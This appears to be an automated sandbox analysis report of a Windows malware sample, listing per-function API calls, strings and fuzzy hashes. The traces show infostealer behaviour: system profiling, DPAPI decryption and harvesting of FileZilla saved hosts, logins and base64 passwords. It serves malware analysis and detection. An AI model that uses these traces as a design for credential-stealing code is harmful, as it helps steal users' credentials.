CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: a842071a5458b069e6114ee4273f0958c48630ca73158fc733b9b6884cf69607
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: a842071a5458b069e6114ee4273f0958c48630ca73158fc733b9b6884cf69607
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c848ff7ff64a615526543de13f70218e726c44d6678eeb4824e3511181b397c4
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: c848ff7ff64a615526543de13f70218e726c44d6678eeb4824e3511181b397c4
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: b5a329db9e36e79b1a8c949012624f509fb78a27d0868de394f5eefc01e8daa8
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: b5a329db9e36e79b1a8c949012624f509fb78a27d0868de394f5eefc01e8daa8
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 1f55c10cc4e895894c9c9c84df19d8311e7896671f88e5e38686d9fa7a25ceb9
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 1f55c10cc4e895894c9c9c84df19d8311e7896671f88e5e38686d9fa7a25ceb9
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00CE6480,00000000,?,0041D758,00000000,?,00000000,00000000,?,00CE6CE8,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,00CE2D58,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,00CE3B40), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,00CE5F10), ref: 004072FB
lstrcat.KERNEL32(?,00CE5FA0), ref: 0040730F
lstrcat.KERNEL32(?,00CE7CD0), ref: 00407322
lstrcat.KERNEL32(?,00CE7CE8), ref: 00407336
lstrcat.KERNEL32(?,00CE7A68), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,00CE5F10), ref: 00407399
lstrcat.KERNEL32(?,00CE5FA0), ref: 004073AD
lstrcat.KERNEL32(?,00CE7CD0), ref: 004073C1
lstrcat.KERNEL32(?,00CE7CE8), ref: 004073D4
lstrcat.KERNEL32(?,00CE7AD0), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,00CE5F10), ref: 00407438
lstrcat.KERNEL32(?,00CE5FA0), ref: 0040744B
lstrcat.KERNEL32(?,00CE7CD0), ref: 0040745F
lstrcat.KERNEL32(?,00CE7CE8), ref: 00407473
lstrcat.KERNEL32(?,00CE7B38), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,00CE5F10), ref: 004074D6
lstrcat.KERNEL32(?,00CE5FA0), ref: 004074EA
lstrcat.KERNEL32(?,00CE7CD0), ref: 004074FD
lstrcat.KERNEL32(?,00CE7CE8), ref: 00407511
lstrcat.KERNEL32(?,00CE7BA0), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,00CE5F10), ref: 00407574
lstrcat.KERNEL32(?,00CE5FA0), ref: 00407588
lstrcat.KERNEL32(?,00CE7CD0), ref: 0040759C
lstrcat.KERNEL32(?,00CE7CE8), ref: 004075AF
lstrcat.KERNEL32(?,00CE7C08), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,00CE5F10), ref: 00407613
lstrcat.KERNEL32(?,00CE5FA0), ref: 00407626
lstrcat.KERNEL32(?,00CE7CD0), ref: 0040763A
lstrcat.KERNEL32(?,00CE7CE8), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(2D575020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,00CE2F08), ref: 004077DB
lstrcat.KERNEL32(?,00CE6968), ref: 004077EE
lstrlen.KERNEL32(2D575020), ref: 004077FB
lstrlen.KERNEL32(2D575020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 203511584f4ee8db67316f34bdb9945a5cf6fc31c1448d58db9406384403e9cb
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 203511584f4ee8db67316f34bdb9945a5cf6fc31c1448d58db9406384403e9cb
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

<Pass encoding="base64">, xrefs: 0040EC9A
<Port>, xrefs: 0040EC06
password: , xrefs: 0040EE3B
browser: FileZilla, xrefs: 0040ED99
url: , xrefs: 0040EDB7
profile: null, xrefs: 0040EDA8
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
login: , xrefs: 0040EE0A
<Host>, xrefs: 0040EBBC
<User>, xrefs: 0040EC50

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 9d15a3c03a9d13f1684e2e20f5d40161921ebc17a2995a8fe698bc9de0368654
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: 9d15a3c03a9d13f1684e2e20f5d40161921ebc17a2995a8fe698bc9de0368654
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
